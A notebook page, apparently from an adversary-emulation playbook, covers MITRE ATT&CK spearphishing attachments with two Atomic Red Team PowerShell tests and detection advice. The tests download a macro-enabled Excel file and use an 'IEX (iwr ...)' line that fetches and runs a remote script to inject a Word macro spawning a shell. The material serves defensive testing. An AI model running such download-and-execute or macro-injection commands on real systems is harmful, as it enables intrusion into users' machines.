# T1566.001 - Phishing: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - Download Phishing Attachment - VBScript
The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
The below will successfully download the macro-enabled Excel file to the current location.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
  return 'Please install Microsoft Excel before running this test.'
}
else{
  $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
  $fileName = 'PhishingAttachment.xlsm'
  New-Item -Type File -Force -Path $fileName | out-null
  $wc = New-Object System.Net.WebClient
  $wc.Encoding = [System.Text.Encoding]::UTF8
  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
  ($wc.DownloadString("$url")) | Out-File $fileName
}
```

In [ ]:
Invoke-AtomicTest T1566.001 -TestNumbers 1

### Atomic Test #2 - Word spawned a command shell and used an IP address in the command line
Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity.
Upon execution, CMD will be lauchned and ping 8.8.8.8

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys

##### Check Prereq Commands:
```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\16.0) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

```

In [ ]:
Invoke-AtomicTest T1566.001 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc $macrocode "16.0" "Word"
```

In [ ]:
Invoke-AtomicTest T1566.001 -TestNumbers 2

## Detection
Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.

Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.